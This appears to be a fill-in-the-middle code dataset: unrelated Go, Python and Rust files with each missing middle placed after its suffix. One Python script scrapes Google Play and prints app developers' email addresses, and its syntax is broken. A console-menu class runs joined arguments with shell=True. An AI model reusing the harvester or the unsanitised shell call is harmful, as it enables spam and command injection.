// Runner represents a command that can be run.
type Runner struct {
runner
}
type runner interface {
Run(name string, args []string, options ...command.Option) error
}
// New returns a Runner.
func New() Runner {
return Runner{
runner: command.New(),
}
}
// BuildArguments holds the arguments we can pass in as flags from the manifest.
type BuildArguments struct {
URI string // Required. Location of ECR Repo. Used to generate image name in conjunction with tag.
ImageTag string // Required. Tag to pass to `docker build` via -t flag. Usually Git commit short ID.
Dockerfile string // Required. Dockerfile to pass to `docker build` via --file flag.
Context string // Optional. Build context directory to pass to `docker build`
Args map[string]string // Optional. Build args to pass via `--build-arg` flags. Equivalent to ARG directives in dockerfile.
AdditionalTags []string // Optional. Additional image tags to pass to docker.
Builder string
Env map[string]string
}
// Build will run a `docker build` command with the input uri, tag, and Dockerfile path.
func (r Runner) Build(in *BuildArguments) error {
if in.Builder != "" {
args := []string{"build"}
args = append(args, imageName(in.URI, "latest"))
args = append(args, "--builder", in.Builder)
dfDir := in.Context
if dfDir != "" {
args = append(args, "--path", dfDir)
}
// Build env arguments
var keys []string
for k := range in.Env {
keys = append(keys, k)
}
sort.Strings(keys)
for _, k := range keys {
args = append(args, "--env", fmt.Sprintf("%s=%s", k, in.Env[k]))
}
err := r.Run("pack", args)
if err != nil {
return fmt.Errorf("building image: %w", err)
}
args = []string{"tag", in.URI + ":latest", in.URI + ":" + in.ImageTag}
err = r.Run("docker", args)
if err != nil {
return fmt.Errorf("building image: %w", err)
}
} else {
dfDir := in.Context
if dfDir == "" { // Context wasn't specified use the Dockerfile's directory as context.
dfDir = filepath.Dir(in.Dockerfile)
}
args := []string{"build"}
// Add additional image tags to the docker build call.
for _, tag := range append(in.AdditionalTags, in.ImageTag) {
args = append(args, "-t", imageName(in.URI, tag))
}
// Add the "args:" override section from manifest to the docker build call
// Collect the keys in a slice to sort for test stability
var keys []string
for k := range in.Args {
keys = append(keys, k)
}
sort.Strings(keys)
for _, k := range keys {
args = append(args, "--build-arg", fmt.Sprintf("%s=%s", k, in.Args[k]))
}
args = append(args, dfDir, "-f", in.Dockerfile)
err := r.Run("docker", args)
if err != nil {
return fmt.Errorf("building image: %w", err)
}
}
return nil
}
// Login will run a `docker login` command against the Service repository URI with the input uri and auth data.
func (r Runner) Login(uri, username, password string) error {
err := r.Run("docker",
[]string{"login", "-u", username, "--password-stdin", uri},
command.Stdin(strings.NewReader(password)))
if err != nil {
return fmt.Errorf("authenticate to ECR: %w", err)
}
return nil
}
// Push will run `docker push` command against the repository URI with the input uri and image tags.
func (r Runner) Push(uri, imageTag string, additionalTags ...string) error {
for _, imageTag := range append(additionalTags, imageTag) {
path := imageName(uri, imageTag)
err := r.Run("docker", []string{"push", path})
if err != nil {
return fmt.Errorf("docker push %s: %w", path, err)
}
}
return nil
}
func | (uri, tag string) string {
return fmt.Sprintf("%s:%s", uri, tag)
}
| imageName |
sequencer_test.go | package sfu
import (
"reflect"
"testing"
"time"
"github.com/stretchr/testify/assert"
)
func Test_sequencer(t *testing.T) {
seq := newSequencer()
off := uint16(15)
for i := uint16(1); i < 520; i++ {
seq.push(i, i+off, 123, 2, true)
}
time.Sleep(60 * time.Millisecond)
req := []uint16{57, 58, 62, 63, 513, 514, 515, 516, 517}
res := seq.getSeqNoPairs(req)
assert.Equal(t, len(req), len(res))
for i, val := range res { | assert.Equal(t, val.getSourceSeqNo(), req[i]-off)
assert.Equal(t, val.getLayer(), uint8(2))
}
res = seq.getSeqNoPairs(req)
assert.Equal(t, 0, len(res))
time.Sleep(150 * time.Millisecond)
res = seq.getSeqNoPairs(req)
assert.Equal(t, len(req), len(res))
for i, val := range res {
assert.Equal(t, val.getTargetSeqNo(), req[i])
assert.Equal(t, val.getSourceSeqNo(), req[i]-off)
assert.Equal(t, val.getLayer(), uint8(2))
}
}
func Test_sequencer_getNACKSeqNo(t *testing.T) {
type args struct {
seqNo []uint16
}
type fields struct {
input []uint16
offset uint16
}
tests := []struct {
name string
fields fields
args args
want []uint16
}{
{
name: "Should get correct seq numbers",
fields: fields{
input: []uint16{2, 3, 4, 7, 8},
offset: 5,
},
args: args{
seqNo: []uint16{4 + 5, 5 + 5, 8 + 5},
},
want: []uint16{4, 8},
},
}
for _, tt := range tests {
tt := tt
t.Run(tt.name, func(t *testing.T) {
n := newSequencer()
for _, i := range tt.fields.input {
n.push(i, i+tt.fields.offset, 123, 3, true)
}
g := n.getSeqNoPairs(tt.args.seqNo)
var got []uint16
for _, sn := range g {
got = append(got, sn.getSourceSeqNo())
}
if !reflect.DeepEqual(got, tt.want) {
t.Errorf("getSeqNoPairs() = %v, want %v", got, tt.want)
}
})
}
} | assert.Equal(t, val.getTargetSeqNo(), req[i]) |
exceptions.py | # -*- coding: utf-8 -*-
"""Chemical Engineering Design Library (ChEDL). Utilities for process modeling.
Copyright (C) 2020 Caleb Bell <[email protected]>
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
This module contains various exception classes that may be raised by chemicals.
For reporting bugs, adding feature requests, or submitting pull requests,
please use the `GitHub issue tracker <https://github.com/CalebBell/chemicals/>`_.
.. contents:: :local:
.. autoclass:: chemicals.exceptions.UnderspecifiedError
.. autoclass:: chemicals.exceptions.OverspeficiedError
.. autoclass:: chemicals.exceptions.TrivialSolutionError
.. autoclass:: chemicals.exceptions.PhaseCountReducedError
.. autoclass:: chemicals.exceptions.PhaseExistenceImpossible
"""
__all__ = ['TrivialSolutionError',
'PhaseCountReducedError',
'PhaseExistenceImpossible',
'UnderspecifiedError',
'OverspeficiedError']
class UnderspecifiedError(Exception):
"""Generic error to raise when not enough values are given."""
class OverspeficiedError(Exception):
"""Generic error to raise when too many values are given."""
class TrivialSolutionError(Exception):
"""Error raised SS converges to trivial solution."""
def __init__(self, message, comp_difference, iterations, err):
|
class PhaseCountReducedError(Exception):
"""Error raised SS inner flash loop says all Ks are under 1 or above 1."""
def __init__(self, message, zs=None, Ks=None):
super().__init__(message)
self.zs = zs
self.Ks = Ks
class PhaseExistenceImpossible(Exception):
"""Error raised SS inner flash loop says all Ks are under 1 or above 1."""
def __init__(self, message, zs=None, T=None, P=None):
super().__init__(message)
self.zs = zs
self.T = T
self.P = P
| super().__init__(message)
self.comp_difference = comp_difference
self.iterations = iterations
self.err = err |
command_item.py | import subprocess
from consolemenu.items import ExternalItem
class CommandItem(ExternalItem):
"""
A menu item to execute a console command
"""
def __init__(self, text, command, arguments=None, menu=None, should_exit=False):
|
def action(self):
"""
This class overrides this method
"""
commandline = "{0} {1}".format(self.command, " ".join(self.arguments))
try:
completed_process = subprocess.run(commandline, shell=True)
self.exit_status = completed_process.returncode
except AttributeError:
self.exit_status = subprocess.call(commandline, shell=True)
def get_return(self):
"""
:return: the exit status of the command
:rtype: int
"""
return self.exit_status
| """
:ivar str command: The console command to be executed
:ivar list[str] arguments: An optional list of string arguments to be passed to the command
:ivar int exit_status: the exit status of the command, None if it hasn't been run yet
"""
super(CommandItem, self).__init__(text=text, menu=menu, should_exit=should_exit)
self.command = command
if arguments:
self.arguments = arguments
else:
self.arguments = []
self.exit_status = None |
FormData.py | # -*- coding: utf8 -*-
__author__ = 'Aleksandrov Oleg, 4231'
from PDFGenDAOPostgres import PDFGenDAOPostgres
from PDFGenDAOMySQL import PDFGenDAOMySQL
import settings
class FormData:
__dao = None
__qs = []
__small_qr = []
__version = "0.1"
__id_user = "null"
__id_owner = "null"
__id_premise = "null"
__id_meeting = "null"
__fio = "______________________"
__phoneNumber = "______________________" | __houseNumb = '_____'
__apartment = '_______'
__form = '_____________'
__share = '____________'
__formDate = '_________'
__propertyS = '___________'
__css = ''
def __init__(self, id_user, id_meeting):
# init db type
if settings.DB == "mysql":
self.__dao = PDFGenDAOMySQL()
else:
self.__dao = PDFGenDAOPostgres()
# clear date
self.__small_qr = []
self.__qs = []
# get date
self.__id_meeting = str(id_meeting)
self.__id_user = str(id_user)
qs_small_qr = self.__dao.get_question(id_meeting)
for value in qs_small_qr:
self.__small_qr.append('s' + str(value[2]))
self.__qs.append(str(value[0]) + " " +value[1])
if str(self.__dao.check_premise(self.__id_user)[0][0]) != 'None':
result = self.__dao.get_title(id_meeting, id_user)
self.__fio = result[0][2] + " " + result[0][0] + " " + result[0][1]
self.__city = result[0][3]
self.__street = result[0][4]
self.__houseNumb = result[0][5]
self.__apartment = str(result[0][6])
self.__form = str(result[0][8])
self.__share = str(round(result[0][9] * 100 / result[0][10], 2)) + '%'
self.__formDate = str(result[0][11])
self.__propertyS = str(result[0][12])
self.__id_premise = str(result[0][13])
self.__id_owner = str(result[0][14])
self.__css = self.__dao.get_css(id_meeting)
def get_date(self):
return {
"fio": self.__fio,
"city": self.__city,
"street": self.__street,
"houseNumb": self.__houseNumb,
"apartment": self.__apartment,
"phoneNumber": self.__phoneNumber,
"formSeries": self.__form,
"formDateOfIssue": self.__formDate,
"propertyS": self.__propertyS,
"share": self.__share
}
# версия | 0 или 1| id_user | id_owner| id_premise | id meeting | количество страниц| и номер текущей|
def get_big_qr_code_date(self):
return 'b0|' + self.__get_big_qr_code_date()
def get_big_qr_code_date2(self):
return 'b1|' + self.__get_big_qr_code_date()
def __get_big_qr_code_date(self):
return self.__version.ljust(10, ' ') + '|' \
+ self.__id_user.ljust(10, ' ') + '|' \
+ self.__id_owner.ljust(10, ' ') + '|' \
+ self.__id_premise.ljust(10, ' ') + '|' \
+ self.__id_meeting.ljust(10, ' ')
def get_questions(self):
return self.__qs
def get_small_qr_code_date(self):
return self.__small_qr
def get_css(self):
return self.__css[0]
def end(self):
self.__qs = []
self.__small_qr = []
self.__version = "0.1"
self.__id_user = "null"
self.__id_owner = "null"
self.__id_premise = "null"
self.__id_meeting = "null"
self.__fio = "______________________"
self.__phoneNumber = "______________________"
self.__city = '__________'
self.__street = '___________'
self.__houseNumb = '_____'
self.__apartment = '_______'
self.__form = '_____________'
self.__share = '____________'
self.__formDate = '_________'
self.__propertyS = '___________' | __city = '__________'
__street = '___________' |
protocol.rs | use serde::Serialize;
use std::borrow::Cow;
#[derive(Serialize, Debug, PartialEq, Clone)]
#[serde(tag = "type")]
#[allow(non_camel_case_types)]
pub enum | {
HOPOPT,
ICMP,
IGMP,
GGP,
IPV4,
ST,
TCP,
CBT,
EGP,
IGP,
BBN_RCC_MON,
NVP_II,
PUP,
ARGUS,
EMCON,
XNET,
CHAOS,
UDP,
MUX,
DCN_MEAS,
HMP,
PRM,
XNS_IDP,
TRUNK_1,
TRUNK_2,
LEAF_1,
LEAF_2,
RDP,
IRTP,
ISO_TP4,
NETBLT,
MFE_NSP,
MERIT_INP,
DCCP,
ThirdPC,
IDPR,
XTP,
DDP,
IDPR_CMTP,
TPpp,
IL,
IPV6,
SDRP,
IPV6_ROUTE,
IPV6_FRAG,
IDRP,
RSVP,
GRE,
DSR,
BNA,
ESP,
AH,
I_NLSP,
SWIPE,
NARP,
MOBILE,
TLSP,
SKIP,
IPV6_ICMP,
IPV6_NONXT,
IPV6_OPTS,
CFTP,
SAT_EXPAK,
KRYPTOLAN,
RVD,
IPPC,
SAT_MON,
VISA,
IPCV,
CPNX,
CPHB,
WSN,
PVP,
BR_SAT_MON,
SUN_ND,
WB_MON,
WB_EXPAK,
ISO_IP,
VMTP,
SECURE_VMTP,
VINES,
TTP,
IPTM,
NSFNET_IGP,
DGP,
TCF,
EIGRP,
OSPFIGP,
SPRITE_RPC,
LARP,
MTP,
AX_25,
IPIP,
MICP,
SCC_SP,
ETHERIP,
ENCAP,
GMTP,
IFMP,
PNNI,
PIM,
ARIS,
SCPS,
QNX,
A_N,
IPCOMP,
SNP,
COMPAQ_PEER,
IPX_IN_IP,
VRRP,
PGM,
L2TP,
DDX,
IATP,
STP,
SRP,
UTI,
SMP,
SM,
PTP,
ISIS,
FIRE,
CRTP,
CRUDP,
SSCOPMCE,
IPLT,
SPS,
PIPE,
SCTP,
FC,
RSVP_E2E_IGNORE,
MOBILITY,
UDPLITE,
MPLS_IN_IP,
MANET,
HIP,
SHIM6,
WESP,
ROHC,
ETHERNET,
USE,
RESERVED,
OTHER(Cow<'static, str>),
UNKNOWN
}
impl std::fmt::Display for NetworkProtocol {
fn fmt(&self, f: &mut std::fmt::Formatter) -> std::fmt::Result {
write!(f, "{:?}", self)
// or, alternatively:
// fmt::Debug::fmt(self, f)
}
}
pub fn parse_protocol_id(id: u16) -> NetworkProtocol {
match id {
0 => NetworkProtocol::HOPOPT,
1 => NetworkProtocol::ICMP,
2 => NetworkProtocol::IGMP,
3 => NetworkProtocol::GGP,
4 => NetworkProtocol::IPV4,
5 => NetworkProtocol::ST,
6 => NetworkProtocol::TCP,
7 => NetworkProtocol::CBT,
8 => NetworkProtocol::EGP,
9 => NetworkProtocol::IGP,
10 => NetworkProtocol::BBN_RCC_MON,
11 => NetworkProtocol::NVP_II,
12 => NetworkProtocol::PUP,
13 => NetworkProtocol::ARGUS,
14 => NetworkProtocol::EMCON,
15 => NetworkProtocol::XNET,
16 => NetworkProtocol::CHAOS,
17 => NetworkProtocol::UDP,
18 => NetworkProtocol::MUX,
19 => NetworkProtocol::DCN_MEAS,
20 => NetworkProtocol::HMP,
21 => NetworkProtocol::PRM,
22 => NetworkProtocol::XNS_IDP,
23 => NetworkProtocol::TRUNK_1,
24 => NetworkProtocol::TRUNK_2,
25 => NetworkProtocol::LEAF_1,
26 => NetworkProtocol::LEAF_2,
27 => NetworkProtocol::RDP,
28 => NetworkProtocol::IRTP,
29 => NetworkProtocol::ISO_TP4,
30 => NetworkProtocol::NETBLT,
31 => NetworkProtocol::MFE_NSP,
32 => NetworkProtocol::MERIT_INP,
33 => NetworkProtocol::DCCP,
34 => NetworkProtocol::ThirdPC,
35 => NetworkProtocol::IDPR,
36 => NetworkProtocol::XTP,
37 => NetworkProtocol::DDP,
38 => NetworkProtocol::IDPR_CMTP,
39 => NetworkProtocol::TPpp,
40 => NetworkProtocol::IL,
41 => NetworkProtocol::IPV6,
42 => NetworkProtocol::SDRP,
43 => NetworkProtocol::IPV6_ROUTE,
44 => NetworkProtocol::IPV6_FRAG,
45 => NetworkProtocol::IDRP,
46 => NetworkProtocol::RSVP,
47 => NetworkProtocol::GRE,
48 => NetworkProtocol::DSR,
49 => NetworkProtocol::BNA,
50 => NetworkProtocol::ESP,
51 => NetworkProtocol::AH,
52 => NetworkProtocol::I_NLSP,
53 => NetworkProtocol::SWIPE,
54 => NetworkProtocol::NARP,
55 => NetworkProtocol::MOBILE,
56 => NetworkProtocol::TLSP,
57 => NetworkProtocol::SKIP,
58 => NetworkProtocol::IPV6_ICMP,
59 => NetworkProtocol::IPV6_NONXT,
60 => NetworkProtocol::IPV6_OPTS,
62 => NetworkProtocol::CFTP,
64 => NetworkProtocol::SAT_EXPAK,
65 => NetworkProtocol::KRYPTOLAN,
66 => NetworkProtocol::RVD,
67 => NetworkProtocol::IPPC,
69 => NetworkProtocol::SAT_MON,
70 => NetworkProtocol::VISA,
71 => NetworkProtocol::IPCV,
72 => NetworkProtocol::CPNX,
73 => NetworkProtocol::CPHB,
74 => NetworkProtocol::WSN,
75 => NetworkProtocol::PVP,
76 => NetworkProtocol::BR_SAT_MON,
77 => NetworkProtocol::SUN_ND,
78 => NetworkProtocol::WB_MON,
79 => NetworkProtocol::WB_EXPAK,
80 => NetworkProtocol::ISO_IP,
81 => NetworkProtocol::VMTP,
82 => NetworkProtocol::SECURE_VMTP,
83 => NetworkProtocol::VINES,
//84 => NetworkProtocol::TTP,
84 => NetworkProtocol::IPTM,
85 => NetworkProtocol::NSFNET_IGP,
86 => NetworkProtocol::DGP,
87 => NetworkProtocol::TCF,
88 => NetworkProtocol::EIGRP,
89 => NetworkProtocol::OSPFIGP,
90 => NetworkProtocol::SPRITE_RPC,
91 => NetworkProtocol::LARP,
92 => NetworkProtocol::MTP,
93 => NetworkProtocol::AX_25,
94 => NetworkProtocol::IPIP,
95 => NetworkProtocol::MICP,
96 => NetworkProtocol::SCC_SP,
97 => NetworkProtocol::ETHERIP,
98 => NetworkProtocol::ENCAP,
100 => NetworkProtocol::GMTP,
101 => NetworkProtocol::IFMP,
102 => NetworkProtocol::PNNI,
103 => NetworkProtocol::PIM,
104 => NetworkProtocol::ARIS,
105 => NetworkProtocol::SCPS,
106 => NetworkProtocol::QNX,
107 => NetworkProtocol::A_N,
108 => NetworkProtocol::IPCOMP,
109 => NetworkProtocol::SNP,
110 => NetworkProtocol::COMPAQ_PEER,
111 => NetworkProtocol::IPX_IN_IP,
112 => NetworkProtocol::VRRP,
113 => NetworkProtocol::PGM,
115 => NetworkProtocol::L2TP,
116 => NetworkProtocol::DDX,
117 => NetworkProtocol::IATP,
118 => NetworkProtocol::STP,
119 => NetworkProtocol::SRP,
120 => NetworkProtocol::UTI,
121 => NetworkProtocol::SMP,
122 => NetworkProtocol::SM,
123 => NetworkProtocol::PTP,
124 => NetworkProtocol::ISIS,
125 => NetworkProtocol::FIRE,
126 => NetworkProtocol::CRTP,
127 => NetworkProtocol::CRUDP,
128 => NetworkProtocol::SSCOPMCE,
129 => NetworkProtocol::IPLT,
130 => NetworkProtocol::SPS,
131 => NetworkProtocol::PIPE,
132 => NetworkProtocol::SCTP,
133 => NetworkProtocol::FC,
134 => NetworkProtocol::RSVP_E2E_IGNORE,
135 => NetworkProtocol::MOBILITY,
136 => NetworkProtocol::UDPLITE,
137 => NetworkProtocol::MPLS_IN_IP,
138 => NetworkProtocol::MANET,
139 => NetworkProtocol::HIP,
140 => NetworkProtocol::SHIM6,
141 => NetworkProtocol::WESP,
142 => NetworkProtocol::ROHC,
143 => NetworkProtocol::ETHERNET,
253 => NetworkProtocol::USE,
254 => NetworkProtocol::USE,
255 => NetworkProtocol::RESERVED,
_ => NetworkProtocol::UNKNOWN,
}
}
| NetworkProtocol |
gp_emailextractor.py | import urllib.request
import re,time
s1=time.time()
# some variable for filtering
app_with_download_more_than = 10000
app_updated_after=["year":"2016","date":"1","month":"02"]
def linker(mainlink):
mlink= urllib.request.urlopen(str(mainlink))
page=mlink.read()
#print (page)
link=re.findall('href="/store/apps/details?(.*?)"',str(page),re.DOTALL)
no=0
for i in range(len(link)):
#print link
if(len(link[i])<100):
if(link[i]>link[i-1]):
| mlink= urllib.request.urlopen(pagelink)
appage=str(mlink.read())
data2=re.findall('<span class="htlgb"><div class="IQ1z0d"><span class="htlgb">(.*?)</span></div></span></div><div class="hAyfc"><div class="BgcNfc">',str(appage))
## date
## print("date ="+data2[0])
## downloads
#print("no of download ="+data2[2])
data2=str(data2[2]).replace(",","").replace("+","")
if(int(data2)>=app_with_download_more_than):
mail=re.findall('class="hrTbp euBY6b">(.*?)</a>',appage,re.DOTALL)
print (mail[0])
linker("https://play.google.com/store/apps/details"+str(link[i]))
else:
None
## starting link for extractor
linker("https://play.google.com/store/search?q=cal&c=apps&price=1")
s2=time.time()
## timer
print (s2-s1) | #print (link[i])
pagelink="https://play.google.com/store/apps/details"+str(link[i])
#print (pagelink)
|
generated.go | // Code generated by github.com/99designs/gqlgen, DO NOT EDIT.
package generated
import (
"bytes"
"context"
"errors"
"fmt"
"strconv"
"sync"
"time"
"github.com/99designs/gqlgen/graphql"
"github.com/99designs/gqlgen/graphql/introspection"
"github.com/kfsoftware/statuspage/pkg/graphql/models"
gqlparser "github.com/vektah/gqlparser/v2"
"github.com/vektah/gqlparser/v2/ast"
)
// region ************************** generated!.gotpl **************************
// NewExecutableSchema creates an ExecutableSchema from the ResolverRoot interface.
func | (cfg Config) graphql.ExecutableSchema {
return &executableSchema{
resolvers: cfg.Resolvers,
directives: cfg.Directives,
complexity: cfg.Complexity,
}
}
type Config struct {
Resolvers ResolverRoot
Directives DirectiveRoot
Complexity ComplexityRoot
}
type ResolverRoot interface {
Mutation() MutationResolver
Query() QueryResolver
}
type DirectiveRoot struct {
}
type ComplexityRoot struct {
CheckExecution struct {
ErrorMsg func(childComplexity int) int
ExecutionTime func(childComplexity int) int
ID func(childComplexity int) int
Message func(childComplexity int) int
Status func(childComplexity int) int
}
DeleteResponse struct {
ID func(childComplexity int) int
}
HTTPCheck struct {
ErrorMsg func(childComplexity int) int
Frecuency func(childComplexity int) int
ID func(childComplexity int) int
Identifier func(childComplexity int) int
LatestCheck func(childComplexity int) int
Message func(childComplexity int) int
Status func(childComplexity int) int
URL func(childComplexity int) int
}
IcmpCheck struct {
Address func(childComplexity int) int
ErrorMsg func(childComplexity int) int
Frecuency func(childComplexity int) int
ID func(childComplexity int) int
Identifier func(childComplexity int) int
LatestCheck func(childComplexity int) int
Message func(childComplexity int) int
Status func(childComplexity int) int
}
Mutation struct {
CreateHTTPCheck func(childComplexity int, input models.CreateHTTPCheckInput) int
CreateIcmpCheck func(childComplexity int, input models.CreateIcmpCheckInput) int
CreateTCPCheck func(childComplexity int, input models.CreateTCPCheckInput) int
CreateTLSCheck func(childComplexity int, input models.CreateTLSCheckInput) int
DeleteCheck func(childComplexity int, id string) int
Poll func(childComplexity int) int
}
PollResult struct {
Took func(childComplexity int) int
}
Query struct {
Checks func(childComplexity int) int
Executions func(childComplexity int, checkID string, from *time.Time, until *time.Time) int
}
TCPCheck struct {
Address func(childComplexity int) int
ErrorMsg func(childComplexity int) int
Frecuency func(childComplexity int) int
ID func(childComplexity int) int
Identifier func(childComplexity int) int
LatestCheck func(childComplexity int) int
Message func(childComplexity int) int
Status func(childComplexity int) int
}
TLSCheck struct {
Address func(childComplexity int) int
ErrorMsg func(childComplexity int) int
Frecuency func(childComplexity int) int
ID func(childComplexity int) int
Identifier func(childComplexity int) int
LatestCheck func(childComplexity int) int
Message func(childComplexity int) int
Status func(childComplexity int) int
}
}
type MutationResolver interface {
Poll(ctx context.Context) (*models.PollResult, error)
CreateHTTPCheck(ctx context.Context, input models.CreateHTTPCheckInput) (models.Check, error)
CreateTCPCheck(ctx context.Context, input models.CreateTCPCheckInput) (models.Check, error)
CreateTLSCheck(ctx context.Context, input models.CreateTLSCheckInput) (models.Check, error)
CreateIcmpCheck(ctx context.Context, input models.CreateIcmpCheckInput) (models.Check, error)
DeleteCheck(ctx context.Context, id string) (*models.DeleteResponse, error)
}
type QueryResolver interface {
Checks(ctx context.Context) ([]models.Check, error)
Executions(ctx context.Context, checkID string, from *time.Time, until *time.Time) ([]*models.CheckExecution, error)
}
type executableSchema struct {
resolvers ResolverRoot
directives DirectiveRoot
complexity ComplexityRoot
}
func (e *executableSchema) Schema() *ast.Schema {
return parsedSchema
}
func (e *executableSchema) Complexity(typeName, field string, childComplexity int, rawArgs map[string]interface{}) (int, bool) {
ec := executionContext{nil, e}
_ = ec
switch typeName + "." + field {
case "CheckExecution.errorMsg":
if e.complexity.CheckExecution.ErrorMsg == nil {
break
}
return e.complexity.CheckExecution.ErrorMsg(childComplexity), true
case "CheckExecution.executionTime":
if e.complexity.CheckExecution.ExecutionTime == nil {
break
}
return e.complexity.CheckExecution.ExecutionTime(childComplexity), true
case "CheckExecution.id":
if e.complexity.CheckExecution.ID == nil {
break
}
return e.complexity.CheckExecution.ID(childComplexity), true
case "CheckExecution.message":
if e.complexity.CheckExecution.Message == nil {
break
}
return e.complexity.CheckExecution.Message(childComplexity), true
case "CheckExecution.status":
if e.complexity.CheckExecution.Status == nil {
break
}
return e.complexity.CheckExecution.Status(childComplexity), true
case "DeleteResponse.id":
if e.complexity.DeleteResponse.ID == nil {
break
}
return e.complexity.DeleteResponse.ID(childComplexity), true
case "HttpCheck.errorMsg":
if e.complexity.HTTPCheck.ErrorMsg == nil {
break
}
return e.complexity.HTTPCheck.ErrorMsg(childComplexity), true
case "HttpCheck.frecuency":
if e.complexity.HTTPCheck.Frecuency == nil {
break
}
return e.complexity.HTTPCheck.Frecuency(childComplexity), true
case "HttpCheck.id":
if e.complexity.HTTPCheck.ID == nil {
break
}
return e.complexity.HTTPCheck.ID(childComplexity), true
case "HttpCheck.identifier":
if e.complexity.HTTPCheck.Identifier == nil {
break
}
return e.complexity.HTTPCheck.Identifier(childComplexity), true
case "HttpCheck.latestCheck":
if e.complexity.HTTPCheck.LatestCheck == nil {
break
}
return e.complexity.HTTPCheck.LatestCheck(childComplexity), true
case "HttpCheck.message":
if e.complexity.HTTPCheck.Message == nil {
break
}
return e.complexity.HTTPCheck.Message(childComplexity), true
case "HttpCheck.status":
if e.complexity.HTTPCheck.Status == nil {
break
}
return e.complexity.HTTPCheck.Status(childComplexity), true
case "HttpCheck.url":
if e.complexity.HTTPCheck.URL == nil {
break
}
return e.complexity.HTTPCheck.URL(childComplexity), true
case "IcmpCheck.address":
if e.complexity.IcmpCheck.Address == nil {
break
}
return e.complexity.IcmpCheck.Address(childComplexity), true
case "IcmpCheck.errorMsg":
if e.complexity.IcmpCheck.ErrorMsg == nil {
break
}
return e.complexity.IcmpCheck.ErrorMsg(childComplexity), true
case "IcmpCheck.frecuency":
if e.complexity.IcmpCheck.Frecuency == nil {
break
}
return e.complexity.IcmpCheck.Frecuency(childComplexity), true
case "IcmpCheck.id":
if e.complexity.IcmpCheck.ID == nil {
break
}
return e.complexity.IcmpCheck.ID(childComplexity), true
case "IcmpCheck.identifier":
if e.complexity.IcmpCheck.Identifier == nil {
break
}
return e.complexity.IcmpCheck.Identifier(childComplexity), true
case "IcmpCheck.latestCheck":
if e.complexity.IcmpCheck.LatestCheck == nil {
break
}
return e.complexity.IcmpCheck.LatestCheck(childComplexity), true
case "IcmpCheck.message":
if e.complexity.IcmpCheck.Message == nil {
break
}
return e.complexity.IcmpCheck.Message(childComplexity), true
case "IcmpCheck.status":
if e.complexity.IcmpCheck.Status == nil {
break
}
return e.complexity.IcmpCheck.Status(childComplexity), true
case "Mutation.createHttpCheck":
if e.complexity.Mutation.CreateHTTPCheck == nil {
break
}
args, err := ec.field_Mutation_createHttpCheck_args(context.TODO(), rawArgs)
if err != nil {
return 0, false
}
return e.complexity.Mutation.CreateHTTPCheck(childComplexity, args["input"].(models.CreateHTTPCheckInput)), true
case "Mutation.createIcmpCheck":
if e.complexity.Mutation.CreateIcmpCheck == nil {
break
}
args, err := ec.field_Mutation_createIcmpCheck_args(context.TODO(), rawArgs)
if err != nil {
return 0, false
}
return e.complexity.Mutation.CreateIcmpCheck(childComplexity, args["input"].(models.CreateIcmpCheckInput)), true
case "Mutation.createTcpCheck":
if e.complexity.Mutation.CreateTCPCheck == nil {
break
}
args, err := ec.field_Mutation_createTcpCheck_args(context.TODO(), rawArgs)
if err != nil {
return 0, false
}
return e.complexity.Mutation.CreateTCPCheck(childComplexity, args["input"].(models.CreateTCPCheckInput)), true
case "Mutation.createTlsCheck":
if e.complexity.Mutation.CreateTLSCheck == nil {
break
}
args, err := ec.field_Mutation_createTlsCheck_args(context.TODO(), rawArgs)
if err != nil {
return 0, false
}
return e.complexity.Mutation.CreateTLSCheck(childComplexity, args["input"].(models.CreateTLSCheckInput)), true
case "Mutation.deleteCheck":
if e.complexity.Mutation.DeleteCheck == nil {
break
}
args, err := ec.field_Mutation_deleteCheck_args(context.TODO(), rawArgs)
if err != nil {
return 0, false
}
return e.complexity.Mutation.DeleteCheck(childComplexity, args["id"].(string)), true
case "Mutation.poll":
if e.complexity.Mutation.Poll == nil {
break
}
return e.complexity.Mutation.Poll(childComplexity), true
case "PollResult.took":
if e.complexity.PollResult.Took == nil {
break
}
return e.complexity.PollResult.Took(childComplexity), true
case "Query.checks":
if e.complexity.Query.Checks == nil {
break
}
return e.complexity.Query.Checks(childComplexity), true
case "Query.executions":
if e.complexity.Query.Executions == nil {
break
}
args, err := ec.field_Query_executions_args(context.TODO(), rawArgs)
if err != nil {
return 0, false
}
return e.complexity.Query.Executions(childComplexity, args["checkId"].(string), args["from"].(*time.Time), args["until"].(*time.Time)), true
case "TcpCheck.address":
if e.complexity.TCPCheck.Address == nil {
break
}
return e.complexity.TCPCheck.Address(childComplexity), true
case "TcpCheck.errorMsg":
if e.complexity.TCPCheck.ErrorMsg == nil {
break
}
return e.complexity.TCPCheck.ErrorMsg(childComplexity), true
case "TcpCheck.frecuency":
if e.complexity.TCPCheck.Frecuency == nil {
break
}
return e.complexity.TCPCheck.Frecuency(childComplexity), true
case "TcpCheck.id":
if e.complexity.TCPCheck.ID == nil {
break
}
return e.complexity.TCPCheck.ID(childComplexity), true
case "TcpCheck.identifier":
if e.complexity.TCPCheck.Identifier == nil {
break
}
return e.complexity.TCPCheck.Identifier(childComplexity), true
case "TcpCheck.latestCheck":
if e.complexity.TCPCheck.LatestCheck == nil {
break
}
return e.complexity.TCPCheck.LatestCheck(childComplexity), true
case "TcpCheck.message":
if e.complexity.TCPCheck.Message == nil {
break
}
return e.complexity.TCPCheck.Message(childComplexity), true
case "TcpCheck.status":
if e.complexity.TCPCheck.Status == nil {
break
}
return e.complexity.TCPCheck.Status(childComplexity), true
case "TlsCheck.address":
if e.complexity.TLSCheck.Address == nil {
break
}
return e.complexity.TLSCheck.Address(childComplexity), true
case "TlsCheck.errorMsg":
